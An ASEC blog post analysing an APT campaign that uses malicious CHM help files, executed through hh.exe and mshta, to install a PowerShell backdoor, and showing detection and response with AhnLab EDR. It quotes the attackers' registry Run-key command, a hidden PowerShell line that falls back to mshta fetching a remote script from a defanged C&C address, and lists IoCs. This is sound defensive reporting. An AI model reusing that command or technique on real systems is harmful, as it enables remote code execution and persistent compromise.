AhnLab Security Emergency response Center (ASEC) has shared an APT attack case that has recently used CHM (Compiled HTML Help File).
CHM is a Help screen that is in an HTML format. Threat actors are able to input malicious scrip codes in HTMLs with the inclusion of CHM. The inserted script is executed through hh.exe which is a default OS application. MITRE ATT&CK refers to this technique where a threat actor uses a signed program or a program installed by default on an OS to execute malware as T1218 (System Binary Proxy Execution). MITRE explains that if threat actors use the T1218 technique to execute their malware, they can easily avoid process and signature-based detection due to being executed through a signed binary or a default MS program.
Figure 1. hh.exe file property information
The CHM malware discovered by ASEC this time downloads a malicious script (Figure 2) from the threat actor’s server. It then runs the script, executing PowerShell through mshta.exe.
Figure 2. Script downloaded from the threat actor’s server
The PowerShell script ultimately executed in Figure 2 registers a command to the registry Run key to perform the commands received from the threat actor’s C&C server and maintain persistence.
Command registered to the registry Run key (Maintain persistence)| c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html |
Figure 3 shows the process tree information from AhnLab EDR (Endpoint Detection and Response) of a CHM threat that has been executed as an email attachment.
Figure 3. AhnLab EDR process tree screen of a CHM threat
AhnLab EDR records and detects the behavior information of CHM-type malware threats. Therefore, EDR managers can check if their company’s infrastructure is at risk of CHM-type malware by performing an EDR history search.
- How to check for CHM threat logs: Event -> EDR Behavior -> Define Period -> Search for EDR threats (hh.exe)
Figure 4. AhnLab EDR behavior history showing the detection of hh.exe creating the mshta process
The following is the CHM threat information that can be checked on the AhnLab EDR analysis screen.
[MITRE ATT&CK Information]
Figure 5. MITRE ATT&CK information (T1218.001 -> detection of hh.exe executing mshta.exe)
Figure 6. MITRE ATT&CK information (T1547 -> detection of autorun registry Run key registration)
The recently found CHM threat ultimately executes a backdoor in the form of a PowerShell and registers itself to the autorun registry Run key to maintain persistence. EDR managers can use EDR to remove this threat by checking the threat actor’s C&C server address information shown in Figure 5 and the autorun registry Run key registration information shown in Figure 6.
Managers can also take action by clicking the “Respond” button for threats that have been detected on the EDR console’s [Analysis] – [Threats] tab, as shown in Figure 7. As a feature that allows managers to take measures against threats, it is capable of not only terminating processes but collecting files as well. Moreover, as depicted in Figure 8, EDR is also capable of isolating infected host PCs from the network, thereby preventing further damage caused by activities like lateral movement and execution of malicious commands by threat actors.
Figure 7. Response against threat process
Figure 8. Response to affected host PC
AhnLab V3 and EDR products detect this CHM threat with the aliases below.
[File Detection]
Trojan/CHM.Agent (2023.03.08.03)
Backdoor/Powershell.Generic.SC187227 (2023.03.21.00)
[Behavior Detection]
SystemManipulation/EDR.AutoRun.M3833
Execution/EDR.Mshta.M10996
[IoC]
[CHM]
809528921de39530de59e3793d74af98
[PowerShell]
32445d05dd1348bce9b6a395b2f8fbd8
[C&C]
hxxp://shacc[.]kr/skin/product/1.html
The MITRE ATT&CK mapping related to this CHM threat is as follows.
– T1218.001 System Binary Proxy Execution: Compiled HTML File
– T1547 Boot or Logon Autostart Execution
More details about AhnLab EDR which actively tracks threats and provides endpoint visibility through behavior-based detection and analysis can be found here on the AhnLab page.
The post Tracking the CHM Malware Using EDR appeared first on ASEC BLOG.
Article Link: Tracking the CHM Malware Using EDR - ASEC BLOG